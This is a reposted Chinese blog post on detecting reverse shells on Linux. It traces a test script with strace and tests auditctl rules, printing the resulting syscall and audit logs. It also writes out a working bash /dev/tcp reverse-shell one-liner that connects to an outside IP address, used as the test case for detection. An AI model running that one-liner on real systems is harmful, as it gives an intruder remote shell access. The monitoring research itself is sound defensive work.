• 反弹shell监控


    转自:http://pirogue.org/2017/07/25/reverse-shell/

    一、跟踪系统调用

    1. strace bash test.sh

    root@Kali:~/pirogue/reverse_shell# strace bash test.sh 
    execve("/bin/bash", ["bash", "test.sh"], [/* 50 vars */]) = 0
    brk(NULL) = 0x7a2000
    access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
    mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb87000
    access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
    open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=128554, ...}) = 0
    mmap(NULL, 128554, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb67000
    close(3) = 0
    access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
    open("/lib/x86_64-linux-gnu/libtinfo.so.5", O_RDONLY|O_CLOEXEC) = 3
    read(3, "177ELF2113>1260315"..., 832) = 832
    fstat(3, {st_mode=S_IFREG|0644, st_size=170776, ...}) = 0
    mmap(NULL, 2267936, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd73d000
    mprotect(0x7fcafd762000, 2097152, PROT_NONE) = 0
    mmap(0x7fcafd962000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x25000) = 0x7fcafd962000
    close(3) = 0
    access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
    open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
    read(3, "177ELF2113>1200 "..., 832) = 832
    fstat(3, {st_mode=S_IFREG|0644, st_size=14640, ...}) = 0
    mmap(NULL, 2109680, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd539000
    mprotect(0x7fcafd53c000, 2093056, PROT_NONE) = 0
    mmap(0x7fcafd73b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7fcafd73b000
    close(3) = 0
    access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
    open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
    read(3, "177ELF21133>132032"..., 832) = 832
    fstat(3, {st_mode=S_IFREG|0755, st_size=1689360, ...}) = 0
    mmap(NULL, 3795360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd19a000
    mprotect(0x7fcafd32f000, 2097152, PROT_NONE) = 0
    mmap(0x7fcafd52f000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7fcafd52f000
    mmap(0x7fcafd535000, 14752, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fcafd535000
    close(3) = 0
    mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb65000
    arch_prctl(ARCH_SET_FS, 0x7fcafdb65b40) = 0
    mprotect(0x7fcafd52f000, 16384, PROT_READ) = 0
    mprotect(0x7fcafd73b000, 4096, PROT_READ) = 0
    mprotect(0x7fcafd962000, 16384, PROT_READ) = 0
    mprotect(0x700000, 12288, PROT_READ) = 0
    mprotect(0x7fcafdb8a000, 4096, PROT_READ) = 0
    munmap(0x7fcafdb67000, 128554) = 0
    open("/dev/tty", O_RDWR|O_NONBLOCK) = 3
    close(3) = 0
    brk(NULL) = 0x7a2000
    brk(0x7a3000) = 0x7a3000
    open("/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    brk(0x7a4000) = 0x7a4000
    open("/usr/share/locale/locale.alias", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=2995, ...}) = 0
    brk(0x7a6000) = 0x7a6000
    read(3, "# Locale name alias data base. #"..., 4096) = 2995
    brk(0x7a7000) = 0x7a7000
    brk(0x7a8000) = 0x7a8000
    read(3, "", 4096) = 0
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=368, ...}) = 0
    mmap(NULL, 368, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb86000
    close(3) = 0
    open("/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=26258, ...}) = 0
    mmap(NULL, 26258, PROT_READ, MAP_SHARED, 3, 0) = 0x7fcafdb7f000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=23, ...}) = 0
    mmap(NULL, 23, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7e000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=59, ...}) = 0
    mmap(NULL, 59, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7d000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=167, ...}) = 0
    mmap(NULL, 167, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7c000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_NAME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_NAME", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=77, ...}) = 0
    mmap(NULL, 77, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7b000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_PAPER", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_PAPER", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=34, ...}) = 0
    mmap(NULL, 34, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7a000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    close(3) = 0
    open("/usr/lib/locale/en_US.utf8/LC_MESSAGES/SYS_LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=57, ...}) = 0
    mmap(NULL, 57, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb79000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=286, ...}) = 0
    mmap(NULL, 286, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb78000
    close(3) = 0
    brk(0x7a9000) = 0x7a9000
    open("/usr/lib/locale/en_US.UTF-8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=1244054, ...}) = 0
    mmap(NULL, 1244054, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafda35000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_TIME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_TIME", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=2454, ...}) = 0
    mmap(NULL, 2454, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb77000
    close(3) = 0
    brk(0x7aa000) = 0x7aa000
    open("/usr/lib/locale/en_US.UTF-8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=54, ...}) = 0
    mmap(NULL, 54, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb76000
    close(3) = 0
    open("/usr/lib/locale/en_US.UTF-8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    open("/usr/lib/locale/en_US.utf8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=328180, ...}) = 0
    mmap(NULL, 328180, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafd9e4000
    close(3) = 0
    brk(0x7ab000) = 0x7ab000
    getuid() = 0
    getgid() = 0
    geteuid() = 0
    getegid() = 0
    rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
    ioctl(-1, TIOCGPGRP, 0x7ffeed7229ac) = -1 EBADF (Bad file descriptor)
    sysinfo({uptime=195741, loads=[21312, 14080, 6432], totalram=4148080640, freeram=202342400, sharedram=510382080, bufferram=24547328, totalswap=2145382400, freeswap=1889628160, procs=584, totalhigh=0, freehigh=0, mem_unit=1}) = 0
    brk(0x7ac000) = 0x7ac000
    rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
    rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
    rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    uname({sysname="Linux", nodename="Kali", ...}) = 0
    brk(0x7b0000) = 0x7b0000
    brk(0x7b2000) = 0x7b2000
    brk(0x7b4000) = 0x7b4000
    brk(0x7b5000) = 0x7b5000
    brk(0x7b6000) = 0x7b6000
    brk(0x7b7000) = 0x7b7000
    brk(0x7b8000) = 0x7b8000
    stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat("/root", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    getpid() = 4833
    brk(0x7b9000) = 0x7b9000
    getppid() = 4831
    stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
    stat("/usr/local/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
    stat("/usr/local/bin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
    stat("/usr/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
    stat("/usr/bin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
    stat("/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    geteuid() = 0
    getegid() = 0
    getuid() = 0
    getgid() = 0
    access("/bin/bash", X_OK) = 0
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    geteuid() = 0
    getegid() = 0
    getuid() = 0
    getgid() = 0
    access("/bin/bash", R_OK) = 0
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    geteuid() = 0
    getegid() = 0
    getuid() = 0
    getgid() = 0
    access("/bin/bash", X_OK) = 0
    stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
    geteuid() = 0
    getegid() = 0
    getuid() = 0
    getgid() = 0
    access("/bin/bash", R_OK) = 0
    getpid() = 4833
    brk(0x7ba000) = 0x7ba000
    brk(0x7bb000) = 0x7bb000
    getpgrp() = 4831
    ioctl(2, TIOCGPGRP, [4831]) = 0
    rt_sigaction(SIGCHLD, {sa_handler=0x44cf90, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
    getrlimit(RLIMIT_NPROC, {rlim_cur=15710, rlim_max=15710}) = 0
    brk(0x7bc000) = 0x7bc000
    brk(0x7bd000) = 0x7bd000
    rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
    brk(0x7be000) = 0x7be000
    open("test.sh", O_RDONLY) = 3
    stat("test.sh", {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
    ioctl(3, TCGETS, 0x7ffeed722940) = -1 ENOTTY (Inappropriate ioctl for device)
    lseek(3, 0, SEEK_CUR) = 0
    read(3, "exec 9<> /dev/tcp/130.182.116.111"..., 80) = 73
    lseek(3, 0, SEEK_SET) = 0
    getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=4*1024}) = 0
    fcntl(255, F_GETFD) = -1 EBADF (Bad file descriptor)
    dup2(3, 255) = 255
    close(3) = 0
    fcntl(255, F_SETFD, FD_CLOEXEC) = 0
    fcntl(255, F_GETFL) = 0x8000 (flags O_RDONLY|O_LARGEFILE)
    fstat(255, {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
    lseek(255, 0, SEEK_CUR) = 0
    brk(0x7bf000) = 0x7bf000
    read(255, "exec 9<> /dev/tcp/130.182.116.111"..., 73) = 73
    brk(0x7c0000) = 0x7c0000
    socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
    connect(3, {sa_family=AF_INET, sin_port=htons(2323), sin_addr=inet_addr("130.182.116.111")}, 16) = 0
    fcntl(9, F_GETFD) = -1 EBADF (Bad file descriptor)
    dup2(3, 9) = 9
    close(3) = 0
    fcntl(0, F_GETFD) = 0
    fcntl(0, F_DUPFD, 10) = 10
    fcntl(0, F_GETFD) = 0
    fcntl(10, F_SETFD, FD_CLOEXEC) = 0
    dup2(9, 0) = 0
    fcntl(9, F_GETFD) = 0
    close(10) = 0
    fcntl(1, F_GETFD) = 0
    fcntl(1, F_DUPFD, 10) = 10
    fcntl(1, F_GETFD) = 0
    fcntl(10, F_SETFD, FD_CLOEXEC) = 0
    dup2(9, 1) = 1
    fcntl(9, F_GETFD) = 0
    fcntl(2, F_GETFD) = 0
    fcntl(2, F_DUPFD, 10) = 11
    fcntl(2, F_GETFD) = 0
    fcntl(11, F_SETFD, FD_CLOEXEC) = 0
    dup2(1, 2) = 2
    fcntl(1, F_GETFD) = 0
    close(11) = 0
    close(10) = 0
    brk(0x7c1000) = 0x7c1000
    rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
    clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7fcafdb65e10) = 4834
    rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
    rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
    rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
    rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
    rt_sigaction(SIGINT, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], 0, NULL) = 4834
    rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
    rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
    --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4834, si_uid=0, si_status=127, si_utime=0, si_stime=0} ---
    wait4(-1, 0x7ffeed722010, WNOHANG, NULL) = -1 ECHILD (No child processes)
    rt_sigreturn({mask=[]}) = 0
    read(255, "", 73) = 0
    rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
    rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
    exit_group(127) = ?
    +++ exited with 127 +++

    2. strace -c bash test.sh

    reverse-shell

    二、audit监控分析

    1. audit相关资料

    2. 测试audit监控规则

    auditctl -A exit,always -S connect
    auditctl -a exit,always -F arch=b64 -F a0=2 -F a1=1 -S socket -k CONNECTION
    auditctl -a exit,always -F arch=b64 -S connect

    1) auditctl -a exit,always -F arch=b64 -S connect

    root@Kali:~/pirogue/reverse_shell# auditctl -l
    -a always,exit -F arch=b64 -S connect

    回显:

    tailf /var/log/audit/audit.log

    type=CONFIG_CHANGE msg=audit(1500974819.373:24): auid=0 ses=3 op="add_rule" key=(null) list=4 res=1
    • bash test.sh

    回显:

    tailf /var/log/audit/audit.log

    type=SYSCALL msg=audit(1500975246.989:30): arch=c000003e syscall=42 success=yes exit=0 a0=3 a1=1c052b8 a2=10 a3=129 items=0 ppid=4722 pid=7736 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="bash" exe="/bin/bash" key=(null)
    type=SOCKADDR msg=audit(1500975246.989:30): saddr=0200091385827E520000000000000000
    type=PROCTITLE msg=audit(1500975246.989:30): proctitle=6261736800746573742E7368
    • exec 9<> /dev/tcp/130.182.116.111/2323;exec 0<&9;exec 1>&9 2>&1;/bin/bash

    直接执行反弹命令,并没有audit到网络连接行为。但反弹shell中执行:whoami,出现回显。

    type=SYSCALL msg=audit(1500975460.957:49): arch=c000003e syscall=42 success=no exit=-2 a0=3 a1=7ffe9c798490 a2=6e a3=6 items=1 ppid=7771 pid=7775 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
    type=SOCKADDR msg=audit(1500975460.957:49): saddr=01002F7661722F72756E2F6E7363642F736F636B657400000000000000000000E029ECE3CD550000002CECE3CD55000000000000000000004B389E12077F00008028ECE3CD55000080988C12077F00001C000000000000004073C312077F0000F386799CFE7F0000100000000000
    type=CWD msg=audit(1500975460.957:49): cwd="/root"
    type=PATH msg=audit(1500975460.957:49): item=0 name="/var/run/nscd/socket" nametype=UNKNOWN
    type=PROCTITLE msg=audit(1500975460.957:49): proctitle="whoami"
    type=SYSCALL msg=audit(1500975460.961:50): arch=c000003e syscall=42 success=no exit=-2 a0=3 a1=7ffe9c798640 a2=6e a3=6 items=1 ppid=7771 pid=7775 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
    type=SOCKADDR msg=audit(1500975460.961:50): saddr=01002F7661722F72756E2F6E7363642F736F636B65740000109AE512077F000001000000000000000000000000000000C887799CFE7F0000D120C412077F00000100000000000000109AE512077F0000010000000000000000000000000000000100000000000000000000000000
    type=CWD msg=audit(1500975460.961:50): cwd="/root"
    type=PATH msg=audit(1500975460.961:50): item=0 name="/var/run/nscd/socket" nametype=UNKNOWN
    type=PROCTITLE msg=audit(1500975460.961:50): proctitle="whoami"

    2) auditctl -a always,exit -F arch=b64 -S socket

    type=SYSCALL msg=audit(1500976257.753:113): arch=c000003e syscall=41 success=yes exit=3 a0=2 a1=1 a2=6 a3=2b items=0 ppid=2409 pid=7894 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="bash" exe="/bin/bash" key=(null)
    type=PROCTITLE msg=audit(1500976257.753:113): proctitle="/usr/lib/gnome-terminal/gnome-terminal-server"

    执行反弹命令直接监控到日志如上。输入whoami,也可监控到回显:

    type=SYSCALL msg=audit(1500976407.153:125): arch=c000003e syscall=41 success=yes exit=3 a0=1 a1=80801 a2=0 a3=6 items=0 ppid=7923 pid=7956 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
    type=PROCTITLE msg=audit(1500976407.153:125): proctitle="whoami"
    type=SYSCALL msg=audit(1500976407.153:126): arch=c000003e syscall=41 success=yes exit=3 a0=1 a1=80801 a2=0 a3=6 items=0 ppid=7923 pid=7956 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
    type=PROCTITLE msg=audit(1500976407.153:126): proctitle="whoami"

    待续…

  • 相关阅读:
    [译]K-D-B-tree(草稿,第一次翻译)
    [LeetCode]Letter Combinations of a Phone Number
    [LeetCode]Multiply Strings
    [LeetCode]Populating Next Right Pointers in Each Node
    [LeetCode]Sum Root to Leaf Numbers
    [LeetCode]String to Integer (atoi)
    [LeetCode]Path Sum II
    [LeetCode]Minimum Depth of Binary Tree
    线上死锁问题排查
    Redis(四):独立功能的实现
  • 原文地址:https://www.cnblogs.com/0day5/p/8280400.html
Copyright © 2020-2023  润新知